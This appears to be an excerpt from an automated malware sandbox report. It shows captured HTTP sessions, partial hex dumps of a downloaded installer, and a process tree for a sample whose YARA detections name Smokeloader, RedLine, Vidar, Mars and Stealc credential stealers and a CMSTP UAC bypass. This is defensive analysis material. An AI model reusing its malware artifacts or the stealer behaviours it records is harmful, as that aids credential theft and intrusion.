                                                                                                                                                      Cookie: 1P_JAR=2024-04-27-00; NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs
                                                                                                                                                      2024-04-27 00:20:17 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:17 GMT
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                                      Content-Length: 3185
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-04-27 00:20:17 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                                                      2024-04-27 00:20:17 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 39 41 41 56 66 35 66 68 33
                                                                                                                                                      Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="9AAVf5fh3
                                                                                                                                                      2024-04-27 00:20:17 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                                                                      Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.449761169.150.236.99443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:50 UTC211OUTHEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                      Host: download.iolo.net
                                                                                                                                                      2024-04-27 00:20:51 UTC639INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:51 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 59721128
                                                                                                                                                      Connection: close
                                                                                                                                                      Server: BunnyCDN-IL1-1069
                                                                                                                                                      CDN-PullZone: 1654350
                                                                                                                                                      CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
                                                                                                                                                      CDN-RequestCountryCode: US
                                                                                                                                                      Cache-Control: public, max-age=259200
                                                                                                                                                      Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT
                                                                                                                                                      CDN-StorageServer: LA-356
                                                                                                                                                      CDN-FileServer: 775
                                                                                                                                                      CDN-ProxyVer: 1.04
                                                                                                                                                      CDN-RequestPullSuccess: True
                                                                                                                                                      CDN-RequestPullCode: 206
                                                                                                                                                      CDN-CachedAt: 04/17/2024 19:42:45
                                                                                                                                                      CDN-EdgeStorageId: 1070
                                                                                                                                                      CDN-Status: 200
                                                                                                                                                      CDN-RequestId: 1eb986a62ffcf839ceda8f1818eafba7
                                                                                                                                                      CDN-Cache: HIT
                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.449763169.150.236.99443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:51 UTC262OUTGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      If-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMT
                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                      Host: download.iolo.net
                                                                                                                                                      2024-04-27 00:20:51 UTC639INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:51 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 59721128
                                                                                                                                                      Connection: close
                                                                                                                                                      Server: BunnyCDN-IL1-1069
                                                                                                                                                      CDN-PullZone: 1654350
                                                                                                                                                      CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
                                                                                                                                                      CDN-RequestCountryCode: US
                                                                                                                                                      Cache-Control: public, max-age=259200
                                                                                                                                                      Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT
                                                                                                                                                      CDN-StorageServer: LA-356
                                                                                                                                                      CDN-FileServer: 775
                                                                                                                                                      CDN-ProxyVer: 1.04
                                                                                                                                                      CDN-RequestPullSuccess: True
                                                                                                                                                      CDN-RequestPullCode: 206
                                                                                                                                                      CDN-CachedAt: 04/17/2024 19:42:45
                                                                                                                                                      CDN-EdgeStorageId: 1070
                                                                                                                                                      CDN-Status: 200
                                                                                                                                                      CDN-RequestId: 96681bd5bdb33b4d25a37ccc405b5d22
                                                                                                                                                      CDN-Cache: HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-04-27 00:20:51 UTC15745INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 20 3b ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c4 8a 03 00 56 04 00 00 00 00 00 fa e2 8a 03 00 20 00 00 00 00 8b 03 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 8f 03 00 02 00 00 54 70 8f 03 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ;"0V @ Tp`
                                                                                                                                                      2024-04-27 00:20:51 UTC23INData Raw: 16 1f 0a 16 28 4d 00 00 06 08 28 27 00 00 0a 2d 33 11 15 2d 03 14 2b
                                                                                                                                                      Data Ascii: (M('-3-+
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 18 11 15 72 b1 10 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0d 11 15 72 b1 10 00 70 08 6f e9 00 00 0a 09 28 27 00 00 0a 2d 33 11 15 2d 03 14 2b 18 11 15 72 22 29 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0d 11 15 72 22 29 00 70 09 6f e9 00 00 0a 11 04 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 83 0a 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0e 11 15 72 83 0a 00 70 11 04 6f e9 00 00 0a 11 05 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 a9 10 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0e 11 15 72 a9 10 00 70 11 05 6f e9 00 00 0a 11 06 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 b9 10 00 70 28 3b 00 00 0a 25
                                                                                                                                                      Data Ascii: rp(;%-&+o(',rpo('-3-+r")p(;%-&+o(',r")po('-4-+rp(;%-&+o(',rpo('-4-+rp(;%-&+o(',rpo('-4-+rp(;%
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 0a 0a 28 3e 01 00 0a 6f 3f 01 00 0a 0b 06 72 90 5a 00 70 28 2a 00 00 0a 0c 08 28 ac 00 00 0a 2c 06 08 28 a3 00 00 0a 07 08 1b 6f bb 01 00 0a 2d 1a 06 28 ab 00 00 0a 26 07 08 28 ef 00 00 0a 08 03 28 6f 00 00 06 26 17 0d de 07 de 03 26 de 00 16 2a 09 2a 01 10 00 00 00 00 00 00 5d 5d 00 03 1c 00 00 01 7e 28 4c 00 00 0a 28 1b 00 00 0a 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 6f bc 01 00 0a 2a 1b 30 06 00 12 01 00 00 38 00 00 11 04 6f bd 01 00 0a 0a 28 5f 00 00 0a 06 14 14 6f 60 00 00 0a 72 11 00 00 70 0b 7e 0a 00 00 04 28 ac 00 00 0a 2c 5f 7e 0a 00 00 04 28 fe 00 00 0a 73 be 01 00 0a 0c 08 6f 06 01 00 0a 0d 09 6f a9 00 00 0a 20 00 04 00 00 31 2d 09 09 6f a9 00 00 0a 20 00 04 00 00 59 6f bf 01 00 0a 1f 0a 6f c0 01 00 0a 13 04 09 09 6f a9 00 00 0a 11 04 59
                                                                                                                                                      Data Ascii: (>o?rZp(*(,(o-(&((o&&**]]~(L(oooo*08o(_o`rp~(,_~(soo 1-o YoooY
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 65 46 72 6f 6d 43 4c 53 49 44 00 55 6e 69 6e 73 74 61 6c 6c 47 55 49 44 00 61 42 72 61 6e 64 49 44 00 61 50 72 6f 64 49 44 00 67 65 74 5f 45 43 6f 6d 6d 49 44 00 67 65 74 5f 45 63 6f 6d 6d 49 44 00 73 65 74 5f 45 63 6f 6d 6d 49 44 00 61 45 63 6f 6d 6d 49 44 00 70 72 6f 63 65 73 73 49 44 00 67 65 74 5f 50 72 6f 64 75 63 74 49 44 00 73 65 74 5f 50 72 6f 64 75 63 74 49 44 00 45 45 43 49 00 67 65 74 5f 41 53 43 49 49 00 45 50 49 00 49 6e 73 74 61 6c 6c 65 72 53 4d 55 44 55 49 00 49 6e 69 74 69 61 6c 69 7a 65 47 55 49 00 49 6e 69 74 69 61 6c 69 7a 65 55 49 00 67 65 74 5f 49 6e 73 74 61 6c 6c 65 72 55 49 00 45 41 4b 00 41 75 64 69 74 46 69 6c 65 50 61 74 68 54 6f 58 4d 4c 00 69 6e 76 6f 6b 65 5f 43 6c 65 61 6e 75 70 5f 61 75 64 69 74 46 69 6c 65 70 61 74 68 54
                                                                                                                                                      Data Ascii: eFromCLSIDUninstallGUIDaBrandIDaProdIDget_ECommIDget_EcommIDset_EcommIDaEcommIDprocessIDget_ProductIDset_ProductIDEECIget_ASCIIEPIInstallerSMUDUIInitializeGUIInitializeUIget_InstallerUIEAKAuditFilePathToXMLinvoke_Cleanup_auditFilepathT
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 6c 00 20 00 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 50 00 72 00 6f 00 63 00 65 00 65 00 64 00 2c 00 20 00 54 00 68 00 69 00 73 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 4f 00 66 00 20 00 54 00 68 00 65 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 20 00 49 00 73 00 20 00 41 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 64 00 00 2f 53 00 69 00 6c 00 65 00 6e 00 74 00 20 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 20 00 43 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 00 71 49 00 4e 00 53 00 54 00 41 00 4c 00 4c 00 20 00 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 50 00 72 00 6f 00 63 00 65 00 65 00 64 00 2c 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69
                                                                                                                                                      Data Ascii: l Cannot Proceed, This Version Of The Application Is Already Installed/Silent Install CompleteqINSTALL Cannot Proceed, Applicati
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 00 61 00 63 00 79 00 47 00 75 00 61 00 72 00 64 00 69 00 61 00 6e 00 22 00 20 00 2f 00 44 00 49 00 53 00 41 00 42 00 4c 00 45 00 01 80 87 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 41 00 63 00 74 00 69 00 76 00 65 00 53 00 79 00 6e 00 63 00 2d 00 53 00 79 00 73 00 74 00 65 00 6d 00 4d 00 65 00 63 00 68 00 61 00 6e 00 69 00 63 00 22 00 20 00 2f 00 44 00 49 00 53 00 41 00 42 00 4c 00 45 00 01 6f 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 69 00 6f 00 6c 00 6f 00 41
                                                                                                                                                      Data Ascii: acyGuardian" /DISABLE/change /tn "\iolo technologies\ActiveSync-SystemMechanic" /DISABLEo/change /tn "\iolo technologies\ioloA
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 24 df 9e fc 42 bd 90 5a b0 ba 82 d1 89 d7 6a 07 8d 7d 7a 7d 51 7b 3e ed 95 f5 59 fa 50 97 b1 4c 7e 75 7d 16 d9 50 b5 83 62 9f 51 99 9e 5e 24 9f 5d 7e 81 90 9e 32 2c 5e 5f 4f 29 16 e3 a2 f6 ee b7 d7 ab cf ea e8 ad da 83 ba be 5a 47 65 7d a3 45 87 da f3 69 1f 83 41 04 00 8d 7d 66 2b 83 9e 11 53 7b fe ed 59 fa 55 d6 d1 aa cf 6a 0f 50 b4 29 60 b4 ea 50 b9 77 ca 75 23 00 3b 2b 03 b5 f7 4e 7b 96 7e f5 fa 87 49 3b 75 7d b3 fe a8 dc bb e5 9a 11 80 d9 4a 62 66 74 d4 5e 6c 7b 96 7e f5 0c c4 48 ae 91 71 29 a1 f2 ca 29 0f 69 55 d0 33 2a 2a f7 76 b9 95 76 5a 06 62 b5 5f 3b 8e 85 ca bd 55 ae f9 24 20 e5 2b 33 6f b5 9e 5e 6a 56 5f e4 18 29 ef 6c 5e 62 35 0a 4a 2b 33 cd 4c 9c 08 a9 2e 8a 9a 29 53 50 2f cb a8 69 6c 44 38 12 41 55 38 0c b9 b6 16 00 50 3b 30 00 00 a8 ee ef
                                                                                                                                                      Data Ascii: $BZj}z}Q{>YPL~u}PbQ^$]~2,^_O)ZGe}EiA}f+S{YUjP)`Pwu#;+N{~I;u}Jbft^l{~Hq))iU3**vvZb_;U$ +3o^jV_)l^b5J+3L.)SP/ilD8AU8P;0
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0e 1e 1e 0e 02 02 02 02 02 02 02 06 02 06 04 2b 3c 3c 3c 3c 2b 05 02 06 02 06 06 02 06 02 31 3c 31 1d 1d 31 3c 32 06 02 06 02 06 06 06 17 3c 2a 02 33 34 02 2c 3c 18 06 06 06 06 06 06 26 3c 0e 0a 35 36 06 0f 3c 28 06 06 06 06 06 06 2c 3c 09 06 33 36 06 09 3c 2c 06 06 06 06 0a 06 23 3c 20 0a 35 36 0a 20 3c 24 06 0a 06 0a 0a 0a 0d 39 39 13 33 36 13 39 39 11 0a 0a 0a 0a 0a 0a 0a 1b 3b 27 35 36 25 3b 1c 0a 0a 0a 06 0a 0a 0a 0a 0a 0f 1a 30 30 1a 12 0a 0a 0a 0a 0a 0a 0a 0a 0a 0c 0c 0c 22 22 0a 0a 0a 0a 0a 0c 0a 0c 0c 0c 0c 0a 0c 0a 39 39 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 15 15 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 00 00 00 00
                                                                                                                                                      Data Ascii: +<<<<+1<11<2<*34,<&<56<(,<36<,#< 56 <$993699;'56%;00""99
                                                                                                                                                      2024-04-27 00:20:51 UTC16384INData Raw: fb ae 3a 9f 7d c6 3a 03 18 32 0c 00 84 da c0 fc f9 ea 78 f4 11 eb 8c 48 a9 d8 7a 6b 8d bc e8 62 c9 e3 15 b8 92 78 13 b0 5f 7c d3 2d 49 4a 36 37 6b cc d5 d7 28 96 c9 58 a7 44 ca b2 1b ae b7 4e 00 86 14 47 58 84 de b2 99 33 a5 5c d6 3a 23 52 aa 76 da 59 cd bc a0 08 18 94 c4 88 11 1a 7b dd f5 dc 5b 53 62 03 f3 df e7 8b 23 84 1e 03 00 a1 37 30 ff 7d b5 ff e6 37 d6 19 91 53 fd 95 5d d5 78 c6 99 d6 19 40 20 c5 6b 6a 35 76 e6 f5 4a 34 36 59 a7 44 ce d2 2b ae b0 4e 00 86 5c 82 cb 53 11 05 4b af bf 4e d5 5f dd 9d 6b 68 4b ac 76 ef 7d 94 eb ec d4 d2 2b 7e 69 9d 82 00 8a ea e7 53 ac b2 52 63 af bb 9e 47 eb 1a e8 9f 3b 57 1d 4f 3e 61 9d 01 0c 39 ce 00 20 12 b2 8b 17 ab ed c1 07 ac 33 22 a9 fe e0 43 54 7f c8 a1 d6 19 40 20 78 65 65 1a 7b f5 b5 4a ad b3 8e 75 4a 24 2d
                                                                                                                                                      Data Ascii: :}:2xHzkbx_|-IJ67k(XDNGX3\:#RvY{[Sb#70}7S]x@ kj5vJ46YD+N\SKN_khKv}+~iSRcG;WO>a9 3"CT@ xee{JuJ$-


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      8192.168.2.44977020.9.155.145443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:21:16 UTC209OUTPOST /v2/track HTTP/1.1
                                                                                                                                                      Content-Type: application/x-json-stream
                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                      Host: westus2-2.in.applicationinsights.azure.com
                                                                                                                                                      Content-Length: 850
                                                                                                                                                      Expect: 100-continue
                                                                                                                                                      Connection: Keep-Alive


                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:02:18:55
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\TNQTc6Qmkg.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:441'857 bytes
                                                                                                                                                      MD5 hash:FCAC04FB67B3DEC2DB923867C5CB0701
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2778288110.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:02:19:00
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3bs.0.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:294'400 bytes
                                                                                                                                                      MD5 hash:BB2810421305B969836433A1DFB11271
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 39%, Virustotal, Browse
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:02:19:52
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
                                                                                                                                                      Imagebase:0x80000
                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:02:19:52
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
